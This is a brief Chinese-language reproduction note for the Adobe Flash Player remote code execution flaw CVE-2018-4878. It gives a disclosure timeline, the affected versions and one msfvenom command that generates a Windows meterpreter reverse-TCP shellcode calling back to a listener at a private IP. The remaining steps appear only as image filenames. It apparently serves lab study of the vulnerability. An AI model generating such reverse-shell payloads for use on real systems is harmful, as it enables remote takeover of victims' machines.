(CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞

一、漏洞简介

2018年1月31日,韩国CERT发布公告称发现Flash 0day漏洞的野外利用,攻击者执行针对性的攻击;2月1日Adobe发布安全公告,确认Adobe Flash Player 28.0.0.137 及早期版本存在远程代码执行漏洞(CVE-2018-4878);2月2日,Cisco Talos团队发布了事件涉及攻击样本的简要分析;2月7日,Adobe发布了CVE-2018-4878漏洞的安全补丁。

二、漏洞影响

Adobe Flash Player \<= 28.0.0.137

三、复现过程

<!-- -->
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=4444 -f python>shellcode.txt

1.png

2.png

3.png

4.png

5.png

6.png

7.png

8.png

9.png

10.png